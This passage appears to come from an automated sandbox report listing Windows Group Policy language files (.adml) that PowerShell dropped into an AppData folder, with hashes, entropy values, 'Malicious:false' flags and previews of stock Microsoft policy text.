                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Sidebar">Desktop Gadgets</string>.. <string id="TurnOffSidebar">Turn off desktop gadgets</string>.. <string id="TurnOffSidebar_Explain">This policy setting allows you to turn off desktop gadgets. Gadgets are small applets that display information or utilities on the desktop.....If you enable this setting, desktop gadgets will be turned off.....If you disable or do not configure this setting, desktop gadgets will be turned on.....The default is for desktop gadgets to be turned on.</string>.. <string

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\SkyDrive.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (698), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3086
                                                                                                                                                                                                        Entropy (8bit):4.858829936806005
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:c/x8gZmwKweH8weDCmOw7khgLf6aweXLwepnFo7hgjfAwleJ9dwBb7DQweFXKV:wpZmmymCmCeSVAo7hzzM7DXLV
                                                                                                                                                                                                        MD5:7C6ABEF96D8FC4473B348F9CC6AB14CA
                                                                                                                                                                                                        SHA1:4ED99551F1EF8DCD42BC5A66A9072739CBB106A8
                                                                                                                                                                                                        SHA-256:0D9F815210F123D3A3201EA0530F0C5F4C8C2B3CF6AE146402D1B3D7E83E77C6
                                                                                                                                                                                                        SHA-512:A360D6F086C9173869E70027EEB9BA07CE40DEA1098E0582206F7A4D3EF101DDD4DDBCB5A7CB95445CC4394FB09577D6C81DACEC6791F592DE18F80A515C75C8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://www.microsoft.com/GroupPolicy/PolicyDefinitions">.. <displayName>Prevent OneDrive file sync</displayName>.. <description>Prevent files from being automatically synced to OneDrive</description>.. <resources>.. <stringTable>.. general -->.. <string id="SkydriveSettingCategory">OneDrive</string>.. .. prevent file sync-->.. <string id="PreventSkydriveFileSync">Prevent the usage of OneDrive for file storage</string>.. <string id="PreventSkydriveFileSync_help">This policy setting lets you prevent apps and features from working with files on OneDrive...If you enable this policy setting:....* Users can.t access OneDrive from the OneDrive app and file picker...* Windows Store apps can.t access OneDrive using the WinRT API...* OneDrive

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Smartcard.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (505), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13897
                                                                                                                                                                                                        Entropy (8bit):4.622403059025047
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ErlLxCEj//4LPwqCop5PqByD2mqKzeYWApNHXsV3sCkm0gb9DiCPoQCDEi1969sp:OHal3as861969sMot
                                                                                                                                                                                                        MD5:8EE4A00ED150375834D94CDF3644BB08
                                                                                                                                                                                                        SHA1:2818877ACB6381F12CB1583B8C366B8E2E8FB8CF
                                                                                                                                                                                                        SHA-256:CF6F61B50CD4BF427834FEC9D7D5C6FBDC0CDB3C5E8E07A66F04BA3D60E093B9
                                                                                                                                                                                                        SHA-512:4E4B668272BF4F64C4C47E09A2F38422D49391C418A62CB1E955A683B7045E0646FDC33E5565902F20281D28406074FFC07FC9A5AB9A4154B6F2D496C3DD1087
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowCertificatesWithNoEKU">Allow certificates with no extended key usage certificate attribute</string>.. <string id="AllowCertificatesWithNoEKU_help">This policy setting lets you allow certificates without an Extended Key Usage (EKU) set to be used for logon.....In versions of Windows prior to Windows Vista, smart card certificates that are used for logon require an enhanced key usage (EKU) extension with a smart card logon object identifier. This policy setting can be used to modify that restriction.....If

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Snis.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2612
                                                                                                                                                                                                        Entropy (8bit):4.846146849523547
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKmZRbhuTOk1/hK82bGGrTFwbXOxJhK8hTwJkxwXzNCSFV:LeD5pmCZlhuykphr2bGGrTFwb+7hrhT8
                                                                                                                                                                                                        MD5:80C54C63C7D081F9C7D7738D50F1D92A
                                                                                                                                                                                                        SHA1:11ECD72C962D4B9F90E158A8D0D9544A3101D6A0
                                                                                                                                                                                                        SHA-256:D764EA69BA0C9BF3B83D8D497820419A8EC755B4A81C4394DB5A73C6FF19CDFB
                                                                                                                                                                                                        SHA-512:D82E63819C06EBAE7A2E0BD8B9CD879D766EA18A4B2B2CAB3E38A2ECF8D585E40C0F2EF89FD59781B3D6A6152AC65C40A2FEC966BB37151F8DA3CFEA8AD4ED22
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Snis">Server for NIS</string>.. <string id="Snis_LoggingLevel">Turn on extensive logging for Active Directory Domain Services domain controllers that are running Server for NIS</string>.. <string id="Snis_LoggingLevel_Help">This policy setting allows an administrator to configure extensive logging for computers that are running Server for Network Information Service (NIS).....If you enable this policy setting, intermediate steps of NIS map updates or propagations, and whether map updates are successful, a

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Snmp.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5042
                                                                                                                                                                                                        Entropy (8bit):4.799259798850357
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm4bGHevi6cwIJyoKbT6c0Jyovt46cwnJyoPlV:EJHi65MKf6JF4655PH
                                                                                                                                                                                                        MD5:C5F44A83C74633615BB7005A8530B912
                                                                                                                                                                                                        SHA1:63AFE83576A32B083EFA4003A95CD82A66461FDC
                                                                                                                                                                                                        SHA-256:205A6CCFF312FB39D59B754925B871CA51845DEB5224EC0BF41B48BE64589C7D
                                                                                                                                                                                                        SHA-512:A11028E185B061A2F42849F09CBB50AA75D0B6FB25650A65C1099CC33E5CEFD024B870F0E3E5C39C1B632DCDC9B4AB7526D5A29DD5DF1E33BABB45AA31D6F4AC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SNMP_Communities">Specify communities</string>.. <string id="SNMP_PermittedManagers">Specify permitted managers</string>.. <string id="SNMP_PermittedManagers_Help">This policy setting determines the permitted list of hosts that can submit a query to the Simple Network Management (SNMP) agent running on the client computer.....Simple Network Management Protocol is a protocol designed to give a user the capability to remotely manage a computer network by polling and setting terminal values and monitoring ne

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\SoundRec.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1152
                                                                                                                                                                                                        Entropy (8bit):4.968946981075251
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yef8kxNxVhSexuCvLeKF47q8wFV:cgeD5x8gm8fKR8kNxVPcCzeo4XwFV
                                                                                                                                                                                                        MD5:9C112ED54F6D15614FBA9B6AA1CDFBB0
                                                                                                                                                                                                        SHA1:1F3FFFEA352DC383AA91DFC61290B95218910B59
                                                                                                                                                                                                        SHA-256:F44E48D84C8A5914AAEBC31206F09194DC1041F3DEA70AD7ECD0E402EE3DF165
                                                                                                                                                                                                        SHA-512:E60C57BC46963AC5A09F9C7EA82A23A5E06155D4FF0417EE5A0672B7CB053F62D8765FF807FCE58F2EBF15AB835C942B45089DE2A12B5ED3B5CA7C63D62A8941
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Soundrec_DiableApplication_TitleText">Do not allow Sound Recorder to run</string>.. <string id="Soundrec_DisableApplication_DescriptionText">Specifies whether Sound Recorder can run.....Sound Recorder is a feature of Microsoft Windows Vista that can be used to record sound from an audio input device where the recorded sound is encoded and saved as an audio file.....If you enable this policy setting, Sound Recorder will not run.....If you disable or do not configure this policy setting, Sound Recorder can be ru

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\StartMenu.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):54118
                                                                                                                                                                                                        Entropy (8bit):4.666836415862256
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:kpbzNqeMWd095QOJzSqREFzK1HF/KPCyFqcJjkOme8j:kp/xMWd095QKz9oPCyUh
                                                                                                                                                                                                        MD5:41F89434F7FD242C4772AFB8152909BD
                                                                                                                                                                                                        SHA1:BCC3FC1A4CAE549D934AC9C18C61E4C956E275B7
                                                                                                                                                                                                        SHA-256:030E413AF912FFCBFDB98B2E96A898B6826F7653C1ED021F4CEEDCC7B8C2127E
                                                                                                                                                                                                        SHA-512:27C9BFBF15C3B7BF41A4030094F7B588ED531C2EFB4517E5F9F51A82F55E87BB6C58A9C020C9CF35BFFFD953EE91B39115A4D766C29873ADBE95B448E551EF6E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ClearRecentProgForNewUserInStartMenu">Clear the recent programs list for new users</string>.. <string id="ClearRecentProgForNewUserInStartMenu_Help">If you enable this policy setting, the recent programs list in the start menu will be blank for each new user.....If you disable or do not configure this policy, the start menu recent programs list will be pre-populated with programs for each new user.</string>.. <string id="NoGamesFolderOnStartMenu">Remove Games link from Start Menu</string>.. <string i

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\SystemRestore.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2647
                                                                                                                                                                                                        Entropy (8bit):4.731629807407312
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKJzpQytkh9hyLbSTW3bvkKh+HAskRcHGhwHSbzURJ1amFV:LeD5pm1J+cbeKhjREVbFFV
                                                                                                                                                                                                        MD5:F0306B958EC9DAF0C4E5D2BA8355A02E
                                                                                                                                                                                                        SHA1:970411B4074BB88CDC75E6CA63D83B51FD6220E3
                                                                                                                                                                                                        SHA-256:79B2C3CA033B5CCECB7D24032FFBF7A718EC34BAF4C8BA66E862917337B9FBB5
                                                                                                                                                                                                        SHA-512:32777DE33CE98BE7333D9045D8E1033E629160AD7CC205B6CCA1523F2E6886CBEE20F3682D59D315B949B35481711E8B8A6EA7399BD0137A83496D800BC6882E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SR">System Restore</string>.. <string id="SR_DisableConfig">Turn off Configuration</string>.. <string id="SR_DisableConfig_Help">Allows you to disable System Restore configuration through System Protection.....This policy setting allows you to turn off System Restore configuration through System Protection.....System Restore enables users, in the event of a problem, to restore their computers to a previous state without losing personal data files. The behavior of this policy setting depends on the "Turn o

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TPM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (751), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19376
                                                                                                                                                                                                        Entropy (8bit):4.677466344688263
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qPHRyQKHBVDkb+wRZtGixXgixyeMJgKzX1SR7YK9q/:qPHgQyPIbBRZtGYXgYYGKUg
                                                                                                                                                                                                        MD5:62D34160550F61471F77F778AA1280CA
                                                                                                                                                                                                        SHA1:2D681645F48460DBA0875917CBF1D2EA0970A161
                                                                                                                                                                                                        SHA-256:62154D9046066523B2833A380FB4A6841AB369D4E7502D1EF8AD93462E0CCE12
                                                                                                                                                                                                        SHA-512:0ACBF5E61FFB9E1F18496F6713F865E392E92CE613CFC143DAF254F63101CB1B0C0FAF16931B111BF1E47E7206B4676079371BCCD6A25543EA6A18AD676B9590
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of Trusted Platform Module (TPM) owner information. ....TPM owner information includes a cryptographic hash of the TPM owner password. Certain TPM commands can only be run by the TPM owner. This hash authorizes the TPM to run these commands. ....If you enable this policy setting, TPM owner information will be automatically and silently backed up to AD DS when you use Windows to set or change a TP

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TabletPCInputPanel.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (416), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14958
                                                                                                                                                                                                        Entropy (8bit):4.684169671948835
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:ErZjCAOTCAClCIkwgLtL99S6hOmL0wD4mHAwq8Qh5Kxk4kxgxWx+FNPUX0E:XAZALIYLtL9ILa8blKxk4kxgxWxFkE
                                                                                                                                                                                                        MD5:0F06155D65FCA728F2D46F0A96F4801B
                                                                                                                                                                                                        SHA1:E8D67D09DF0AED3FC5AED0832D901F31830D8A8C
                                                                                                                                                                                                        SHA-256:C170A92E97B43769613F0217D452B39D28A856AD93E95C0CD2E9A40FCC04E6A0
                                                                                                                                                                                                        SHA-512:62DAF44885B775BB39F4E38F5188F0FD2096C78A0F5328451F239D78E4F9325224A8A0AAF769DDA8127CCD879F32F6A012B896E01AABAD8133D738B77B54528D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoComplete">Turn off AutoComplete integration with Input Panel</string>.. <string id="AutoCompleteExplain">Turns off the integration of application auto complete lists with Tablet PC Input Panel in applications where this behavior is available.....Tablet PC Input Panel is a Tablet PC accessory that enables you to use handwriting or an on-screen keyboard to enter text, symbols, numbers, or keyboard shortcuts.....If you enable this policy, application auto complete lists will never appear next to Input Panel.

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TabletShell.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (546), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6673
                                                                                                                                                                                                        Entropy (8bit):4.787936688249674
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmXFnAAWTYvS60sTs2ssufgMA7I16D4K9OuNtFV:E6SCKi78DK9XNtn
                                                                                                                                                                                                        MD5:166E80C965CED6606C2DA93D9A03B421
                                                                                                                                                                                                        SHA1:A7651889CBFEF22000E75B348428689C0E755BF7
                                                                                                                                                                                                        SHA-256:88F472A0DA1243EA84662AE4D730D6B86EE53E1901D7CC73EEA724218BD9EBE4
                                                                                                                                                                                                        SHA-512:0CB95E31997AF6E77C155081FCA24FBDE9B401944251ED0D3C04F4A35F017BC3BBB4CFAEEEA8175D56C64CA9352F84DFC45827D76C0DB95CBE314F562C3C4CE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Accessories">Accessories</string>.. <string id="Cursors">Cursors</string>.. <string id="DisableInkball">Do not allow Inkball to run</string>.. <string id="DisableInkball_Help">Prevents start of InkBall game.....If you enable this policy, the InkBall game will not run.....If you disable this policy, the InkBall game will run.....If you do not configure this policy, the InkBall game will run.</string>.. <string id="DisableJournal">Do not allow Windows Journal to be run</string>.. <string id="

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TaskScheduler.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (579), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7038
                                                                                                                                                                                                        Entropy (8bit):4.643182607339355
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ey3uDxqKgSDQ0DiMDoK5DuJW+ibACSYZCn:rWYaQ0Pnu4PjSZ
                                                                                                                                                                                                        MD5:09BB6BBD535E6B16043D7DE703670523
                                                                                                                                                                                                        SHA1:3E7743A2557844CCCC6E5AE42827E676577FE9F4
                                                                                                                                                                                                        SHA-256:00250A97BC62D5C01E534907317937337008B28110DD7AB88A5D32AA347A3B9E
                                                                                                                                                                                                        SHA-512:118B1B0C181AD2DD89955BFDB828E10381F481B81321295AF016A2536B86A26F302F20DFC542974CD512C48F9F2B080CE482D08031BB9B2033328267BF093DD9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowBrowse">Prohibit Browse</string>.. <string id="AllowBrowseHelp">Limits newly scheduled to items on the user's Start menu, and prevents the user from changing the scheduled program for existing tasks.....This setting removes the Browse button from the Schedule Task Wizard and from the Task tab of the properties dialog box for a task. Also, users cannot edit the "Run" box or the "Start in" box that determine the program and path for a task.....As a result, when users create a task, they must select a progra

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Taskbar.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (325), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11395
                                                                                                                                                                                                        Entropy (8bit):4.633029483097701
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EytLqsKeNTdPL5M8R1QfkSK1GOROjzazDzLh5/Cbl4Zgx9IQCmJwgjRLEJn:zM8R1QiGwCCDhtS41
                                                                                                                                                                                                        MD5:B04329C131F6270E21143E3A48884E73
                                                                                                                                                                                                        SHA1:21A2CA3E301813810D7B3874D625C4FABC5DD96A
                                                                                                                                                                                                        SHA-256:17A7E0C29F6FAD55F06306ECE4251A6BF7D40BB30C3178385D01CFFC805A1164
                                                                                                                                                                                                        SHA-512:E50307FA3358D4CAC0C2CE8C5DFD568DDC0795E07DD38A5F655C6BF0F2F071B8D5479D6F89483959054B7256E0BCB09631F8E902B64F0F19CBB051030815633E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HideSCABattery">Remove the battery meter</string>.. <string id="HideSCABattery_Help">This policy setting allows you to remove the battery meter from the system control area.....If you enable this policy setting, the battery meter is not displayed in the system notification area.....If you disable or do not configure this policy setting, the battery meter is displayed in the system notification area.</string>.. <string id="HideSCANetwork">Remove the networking icon</string>.. <string id="HideSCANetwor

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TerminalServer-Server.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19641
                                                                                                                                                                                                        Entropy (8bit):4.878122311324998
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:HTFGnX5V42B4kc7w3p98BlDJQ2yhfOBV41eCFksM08wjblv:HTI5/b2KfSiNbh
                                                                                                                                                                                                        MD5:F835CA2B1226B25600345F974B8706C4
                                                                                                                                                                                                        SHA1:1B7BA254D3835BA025A8D68A8AC757019081AA09
                                                                                                                                                                                                        SHA-256:E827705FA042FDD68C493B5F0159FE68B10F6B310C957A7F23F45F20DB14666E
                                                                                                                                                                                                        SHA-512:183483215CAE2BA72A226AC50F6057D566A23E411C3BAABF0BBBBB6145046E85049F4B526CDA4591C145F6A92AB75567661885EDCECCE13B60EC0C00DD8E28FA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_APP_COMPATIBILITY">Application Compatibility</string>.. <string id="TS_APP_COMPATIBILITY_Help">Controls application compatibility settings on an RD Session Host server</string>.. <string id="TS_TIME_ZONE">Allow time zone redirection</string>.. <string id="TS_TIME_ZONE_EXPLAIN">This policy setting allows you to specify whether the client computer redirects its time zone settings to the Remote Desktop Services session.....If you enable this policy setting, clients that are capable of time zone redir

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TerminalServer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (638), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):127562
                                                                                                                                                                                                        Entropy (8bit):4.836430182678649
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:9h4lfgUCtmBM22pFN8z0u753oq+I/jIqGUZRGUCFUvyP+YA4RhVjn:9hrtHrzGDiI/jIqGYRGQi3Vjn
                                                                                                                                                                                                        MD5:3602B346F09097D79EAA8029915B67F9
                                                                                                                                                                                                        SHA1:4BB802511857288C2ADA07AD532CB19E7CD5CD9D
                                                                                                                                                                                                        SHA-256:FF74BE25815C0CA023FAD48EA35E6FA32566065485534D01842D617EB39F8ACE
                                                                                                                                                                                                        SHA-512:77DDACF30B5D72A159A726FE040218F25D8E902C58CAE6D100F8B01255415C461C55A3645F643FB52D63B8079F0FCE6107CB96358EBBC7141A380D445C4B195A
                                                                                                                                                                                                        Malicious:false
